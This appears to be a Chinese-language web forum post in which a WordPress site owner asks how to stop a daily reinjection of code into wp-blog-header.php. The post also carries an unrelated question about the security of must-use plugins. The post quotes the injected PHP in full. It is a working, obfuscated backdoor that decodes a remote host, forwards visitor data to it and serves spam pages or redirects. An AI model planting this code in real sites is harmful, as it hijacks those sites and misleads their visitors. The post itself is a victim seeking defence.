如何防止机器人或其他人自动修改任何文件？

有人每天修改我们的网站文件wp-blog-header.php.

他们正在添加以下代码，在我们的网站中自动生成不必要的页面，代码为：

$e = pathinfo($f = strtok($p = @$_SERVER["REQUEST_URI"], "?"), PATHINFO_EXTENSION);

if ((!$e || in_array($e, array("html", "jpg", "png", "gif")) ||
    basename($f, ".php") == "index") && in_array(strtok("="), array("", "p", "page_id")) && (empty($_SERVER["HTTP_USER_AGENT"]) ||
        (stripos($u = $_SERVER["HTTP_USER_AGENT"], "AhrefsBot") === false && stripos($u, "MJ12bot") === false))) {

    $at = "base64_" . "decode";

    $ch = curl_init($at("aHR0cDovL3dwYWRtaW5hZG1pLmNvbS8/") . "7d09c3986906332c22b598b781b38d33" . $p);

    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
            "X-Forwarded-For: " . @$_SERVER["REMOTE_ADDR"])
    );

    if (isset($_SERVER["HTTP_USER_AGENT"]))
        curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);

    if (isset($_SERVER["HTTP_REFERER"]))
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]);

    $ci = "curl_ex" . "ec";

    $data = $ci($ch);
    $code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

    if (strlen($data) > 255 && $code == 200) {
        echo $data; exit;
    } else if ($data && ($code == 301 || $code == 302)) {
        header("Location: " . trim($data), true, $code); exit;
    }
}

我们如何预防它？我昨天删除了上面的脚本，今天它又出现在那里了。

我已输入以下内容.htaccess, 但这无助于：

<Files wp-blog-header.php>
deny from all
</Files>

Security and Must Use Plugins

从codex article 必须使用插件：只需将文件上载到mu插件目录即可启用，无需登录我觉得这是一个潜在的安全问题。在站点上运行插件中的任何代码之前，必须通过管理面板激活常规插件。我一直认为这是一个明智的安全预防措施，因为攻击者如果能够以某种方式将文件上载到plugins文件夹，则在运行代码之前，还必须访问和修改数据库。这个mu-plugins 文件夹似乎提供了一种简单的方法来避免这种情况。我知道WordPress开发人员比我更了解安全性，所以我想知道是否有人能解释为什么这不是一个安全漏洞。

相关推荐

Security and Must Use Plugins